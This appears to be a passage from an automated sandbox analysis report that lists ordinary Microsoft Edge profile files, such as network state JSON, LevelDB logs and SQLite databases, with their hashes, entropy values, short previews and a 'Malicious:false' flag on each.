                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\3f55a56e-6dc3-444c-b299-57bc1dc8467f.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\4cb7f9fb-de4b-4054-b2af-471ed3c7f7d2.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\4de69006-9553-4416-9984-4ca54807bfb4.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                                                                                              MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                                                                                              SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                                                                                              SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                                                                                              MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                                                                                              SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                                                                                              SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF240c8.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF26d56.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                                                              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                                                              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                                                              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                                                              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b0926a11-d845-4b45-a653-0e38c4123a24.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):80
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                                                              MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                                                              SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                                                              SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                                                              SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.255235182374039
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:7q93VvdZYebvqBZFUt09l3g/+9hMSI5wZYebvqBaJ:7UbYebvygYMXgYebvL
                                                                                                                                                                                                                                                                                                                                                              MD5:5A76F113C7A90769B9FCB832E2D7C5A5
                                                                                                                                                                                                                                                                                                                                                              SHA1:85E972CF341BC2A11550E8835885D9AACB7F6B04
                                                                                                                                                                                                                                                                                                                                                              SHA-256:9E0DE2821988A245A65FD40191D1529EA7E2C76DB385BC5FFB3ADD8965E7B6A2
                                                                                                                                                                                                                                                                                                                                                              SHA-512:2897D0D846F1A26EB439A66BB60F19D8881E3E2A3B57A91DD3225A6C78CB6EBE154C8D67985CE5CC129A817F67A166F35962F7ECB275A622174EA5F3CDE58FD8
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:17:04.981 1fd4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/02/18-02:17:04.983 1fd4 Recovering log #3.2025/02/18-02:17:04.987 1fd4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.255235182374039
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:7q93VvdZYebvqBZFUt09l3g/+9hMSI5wZYebvqBaJ:7UbYebvygYMXgYebvL
                                                                                                                                                                                                                                                                                                                                                              MD5:5A76F113C7A90769B9FCB832E2D7C5A5
                                                                                                                                                                                                                                                                                                                                                              SHA1:85E972CF341BC2A11550E8835885D9AACB7F6B04
                                                                                                                                                                                                                                                                                                                                                              SHA-256:9E0DE2821988A245A65FD40191D1529EA7E2C76DB385BC5FFB3ADD8965E7B6A2
                                                                                                                                                                                                                                                                                                                                                              SHA-512:2897D0D846F1A26EB439A66BB60F19D8881E3E2A3B57A91DD3225A6C78CB6EBE154C8D67985CE5CC129A817F67A166F35962F7ECB275A622174EA5F3CDE58FD8
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:17:04.981 1fd4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/02/18-02:17:04.983 1fd4 Recovering log #3.2025/02/18-02:17:04.987 1fd4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.27813867550024
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf0xGRSVq2PFi23oH+TcwtpIFUtFf0UgZmw7f0UIkwOFi23oH+Tcwta/WLJ:7KpVvdZYebmFUtDg/xI5wZYebaUJ
                                                                                                                                                                                                                                                                                                                                                              MD5:6E2EAB58F324150AD6E10BD9E4C39B97
                                                                                                                                                                                                                                                                                                                                                              SHA1:498E18984978E6C8F1ABEF184CAD0B02EBED3653
                                                                                                                                                                                                                                                                                                                                                              SHA-256:7B67DABA07005A6BD73020818710F65F3CE696F4DCC00FFBC377F9070E3F2D84
                                                                                                                                                                                                                                                                                                                                                              SHA-512:63B5A57952BEA2DF8B19608DF9CFEEC47A1A22B4DF337A75F7395F36FC479A6416215EA87FD4806A3B5568F614B3F8412A3443B49084E9794D035E4E054FD770
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.785 1bc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/02/18-02:16:42.786 1bc4 Recovering log #3.2025/02/18-02:16:42.786 1bc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.27813867550024
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf0xGRSVq2PFi23oH+TcwtpIFUtFf0UgZmw7f0UIkwOFi23oH+Tcwta/WLJ:7KpVvdZYebmFUtDg/xI5wZYebaUJ
                                                                                                                                                                                                                                                                                                                                                              MD5:6E2EAB58F324150AD6E10BD9E4C39B97
                                                                                                                                                                                                                                                                                                                                                              SHA1:498E18984978E6C8F1ABEF184CAD0B02EBED3653
                                                                                                                                                                                                                                                                                                                                                              SHA-256:7B67DABA07005A6BD73020818710F65F3CE696F4DCC00FFBC377F9070E3F2D84
                                                                                                                                                                                                                                                                                                                                                              SHA-512:63B5A57952BEA2DF8B19608DF9CFEEC47A1A22B4DF337A75F7395F36FC479A6416215EA87FD4806A3B5568F614B3F8412A3443B49084E9794D035E4E054FD770
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.785 1bc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/02/18-02:16:42.786 1bc4 Recovering log #3.2025/02/18-02:16:42.786 1bc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):131072
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0033769341339387224
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:ImtVufb0F/tqtt:IiVuzEt
                                                                                                                                                                                                                                                                                                                                                              MD5:9371EC9D88F41A4C45DC684218EFA268
                                                                                                                                                                                                                                                                                                                                                              SHA1:5CD5594E633CC7C96EC050588CDF52C20501DFF1
                                                                                                                                                                                                                                                                                                                                                              SHA-256:14E2731FF1F493A216A0FE33727AF9802621EAE95FEE65FA80B83443D0A76722
                                                                                                                                                                                                                                                                                                                                                              SHA-512:3D5FFED865EFF5EED6666C7853C12E618B0E96E8452E7A1767A5CE57F62FC32F965C9BA7B578C3FE7EB733624BFD13A6D04E94708AAEFC987A0C46775C7F2351
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:VLnk.....?.......~W.(..H................................................................................................................................................................................................................................Q....m.[........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2654289464783932
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:KrJ/2qOB1nxCkMlSAELyKOMq+8wH0hLUZsrhVum8:K0q+n0Jl9ELyKOMq+8I0hAOG
                                                                                                                                                                                                                                                                                                                                                              MD5:F351D46CEFBAC79C3398EEC49275934C
                                                                                                                                                                                                                                                                                                                                                              SHA1:02D18E737CF4CCF92610218E9195CF9D79442F41
                                                                                                                                                                                                                                                                                                                                                              SHA-256:FA678FE551259FA4940795FEEC8F9BE50C942500F29E8FEBE044BAA53C13F447
                                                                                                                                                                                                                                                                                                                                                              SHA-512:96941386BBA9F4CD4BF9B3CBE7363405252A91E42AB3EB88CBC2F3AB921AD32B1A0C9787BF5B124744DA43983154C4A98D10B3A7A908964FDD780541379C608F
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 11, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):14336
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0240931777174473
